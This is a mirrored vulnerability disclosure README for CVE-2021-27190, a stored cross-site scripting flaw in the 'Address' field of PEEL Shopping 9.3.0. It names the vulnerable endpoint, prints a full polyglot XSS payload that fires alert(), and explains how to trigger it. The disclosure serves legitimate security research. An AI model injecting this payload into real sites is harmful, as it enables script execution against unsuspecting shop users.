Giters

anmolksachan / CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2021-27190 - PEEL Shopping, eCommerce shopping cart - Stored Cross-Site Scripting Vulnerability in 'Address'

Watch the video

Date

2021-02-11

Exploit Author

Anmol K Sachan

Vendor Homepage

https://www.peel.fr/

Software Link

https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/

Vulnerable Software Link

https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing

Software: :

PEEL SHOPPING 9.3.0

Vulnerability Type

Stored Cross-site Scripting

Vulnerability

Stored XSS

Tested on Windows 10 XAMPP


CVE Assigned

CVE-2021-27190
This application is vulnerable to Stored XSS vulnerability.

Vulnerable script

http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php

https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS/edit/main/README.MD## Vulnerable parameters 'Address'

Payload used

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

POC

https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
In the same page where we injected payload click on the text box to edit the address.
You will see your Javascript code (XSS) executed.

Referneces

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
  2. https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
  3. https://www.exploit-db.com/exploits/49553
  4. https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
  5. https://cxsecurity.com/issue/WLB-2021020054
  6. https://nvd.nist.gov/vuln/detail/CVE-2021-27190

About